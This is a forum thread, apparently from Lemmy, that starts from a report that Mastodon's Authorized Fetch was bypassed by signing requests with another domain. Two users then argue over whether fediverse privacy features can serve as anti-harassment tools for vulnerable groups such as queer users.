Authorized Fetch (also referred to as Secure Mode in Mastodon) was recently circumvented by a stupidly easy solution: just sign your fetch requests with some other domain name.

  • AdaA
    link
    fedilink
    English
    arrow-up
    8
    ·
    11 months ago

    Privacy and being free of (in-context) harassment aren’t the same thing.

    They’re related. Often, the ability to limit your audience is about making it non trivial for harassers to access your content rather than impossible.

    If the goal is privacy so that people who aren’t in the community don’t know that you’re in the community

    That’s not the goal. The goal is to make a community that lets vulnerable folk communicate whilst keeping the harassment to a manageable level and making the sensitive content non trivial to access for random trolls and harassers.

    It’s not about stopping dedicated individuals, because they can’t be stopped in this sort of environment for all the reasons you point out. It’s about minimising harassment from the random drive by bigots

    • PeriodicallyPedantic@lemmy.ca
      link
      fedilink
      English
      arrow-up
      3
      ·
      11 months ago

      Hmmm I think I understand the intent. I’ll have to think on it some more.

      My gut tells me that protecting people from drive-by bigotry is antithetical to content/community discovery. And what is a social network without the ability to find new communities to join or new content to see?

      Perhaps something like reddit where they can raise the bar for commenting/posting until you’ve built up karma within the community? That’s not a privacy thing though.

      What would this look like to you, and how does it relate to privacy? I’ve got my own biases that affect how I’m looking at the problem, so I’d be interested in getting another perspective.

      • AdaA
        link
        fedilink
        English
        arrow-up
        3
        ·
        11 months ago

        You’re thinking about this in an all or nothing way. A community in which everyone and everything they post is open to everyone isn’t safe.

        A community in which no one can find members or content unless they’re already connected to that community stagnates and dies.

        A community where some content and some people are public and where some content and some people are locked down is what we need, and though it’s imperfect, things like authorised fetch brings us closer to that, and that’s the niche that future security improvements on the Fediverse need to address.

        No one is looking for perfect, at least not in this space.

        • PeriodicallyPedantic@lemmy.ca
          link
          fedilink
          English
          arrow-up
          1
          ·
          11 months ago

          I don’t think I’m looking for perfect, I’m looking for “good enough” and while authorized fetch is better than nothing, it’s nowhere near “good enough” to be calling anything “private”.

          I’m thinking that maybe we need to reevaluate or reconsider what it looks like to protect people from harassment, in the context of social media. Compare that to how we’re currently using half-functional privacy tools to accomplish it.

          • AdaA
            link
            fedilink
            English
            arrow-up
            2
            ·
            11 months ago

            I’m not saying existing features are good enough.

            I’m saying that they’re better than the alternative that started this conversation.

            “Just loudly proclaim that everything is public but clients can filter out shit you don’t wanna see”

            That’s what Twitter does right now. It’s also a hate filled cesspit.

            The Fediverse though, even though it has hate filled cesspits, gives us tools that put barriers between vulnerable groups and those spaces. The barriers are imperfect, they have booked holes and be climbed over by people who put the effort in, but they still block the worst if it.

            • PeriodicallyPedantic@lemmy.ca
              link
              fedilink
              English
              arrow-up
              1
              ·
              11 months ago

              Right, but what im saying is that the problem of privacy is different than the problem of harassment.

              I’m not saying that we should give up on anti-harassment tools, just that I think that anti-harassment tools that are bolted onto privacy tools cannot work because those privacy tools will be hamstrung by necessity, and I think there must be better solutions.

              Having people think that there is privacy on a social network causes harm, because people are change their behavior based on the unfulfilled expectation of privacy. I suspect there is a way to give up privacy and also solve the problem of harassment. That solution doesn’t have to look like Twitter, but I have my own biases that may negatively affect how my ideas would work in practice.

              I’m asking you

              What might an anti-harassment tool look like on a social network without any pretenses of privacy?

              • AdaA
                link
                fedilink
                English
                arrow-up
                1
                ·
                11 months ago

                What might an anti-harassment tool look like on a social network without any pretenses of privacy?

                There’s no such thing. They are mutually exclusive. Take queer folk for example. We need privacy to be able to talk about our experiences without outing ourselves to the world. It’s especially important for queer kids, and folk that are still in the closet. If they don’t have privacy, they can’t be part of the community, because they open themselves to recognition and harassment in offline spaces.

                With privacy, they can exist in those spaces. It won’t stop a dedicated harasser, but it provides a barrier and stops casual outing.

                An “open network” where everyone can see everything, puts the onus on the minority person. Drive by harassers exist in greater numbers than a vulnerable person can cope with, and when their content is a simple search and a throw away account away from abuse, it means the vulnerable person won’t be there. Blocking them after the fact means nothing.

                • PeriodicallyPedantic@lemmy.ca
                  link
                  fedilink
                  English
                  arrow-up
                  1
                  ·
                  11 months ago

                  An “open network” where everyone can see everything, puts the onus on the minority person

                  But isn’t this already the case?

                  You make a good point about people still in the closet. That’s an excellent use case for privacy. But I still believe that’s a different issue. And I’m fact this is my great concern: people think they have privacy when they dont so they say things that out themselves (as any kind of minority) accidentally, because they mistakenly relied on the network privacy.

                  You’re right though, it’s not all-or-nothing, but I do think these are two separate problems that can and maybe should have different solutions.

                  The type of drive-by harassment you describe is by online randos, not in-person. For those situations, is it not enough that you remain oblivious to the attempted harassment? If a bigot harasses in a forest and nobody is around to hear it, did they really harass?

                  • AdaA
                    link
                    fedilink
                    English
                    arrow-up
                    2
                    ·
                    11 months ago

                    is it not enough that you remain oblivious to the attempted harassment? If a bigot harasses in a forest and nobody is around to hear it, did they really harass?

                    The problem is, there are plenty of other people around to hear it. Everyone else except the harassed person can see it, and on top of that, the fact that harassment is trivial to do, and not policed, ensures that more harassers will come along. Each one having to be blocked one by one by the people they’re harassing, after the harassment has already taken place.

                    As I said earlier, this is how twitter does things, and there is a reason that vulnerable folk don’t use twitter anymore.

                    But isn’t this already the case?

                    No, it isn’t, because right now, local only posting, follower only posting, authorised fetch, admin level instance blocks etc, all combine to make it non trivial for harassers. If you’re familiar with the “swiss cheese defence model”, that’s basically what we have here. Every single one of those things can be worked around, especially by someone dedicated to harassing folk, but the casual trolls and bigots, they won’t get through all of them. The more imperfect security, anti harassment and privacy options we have, the harder it is for casual bigots.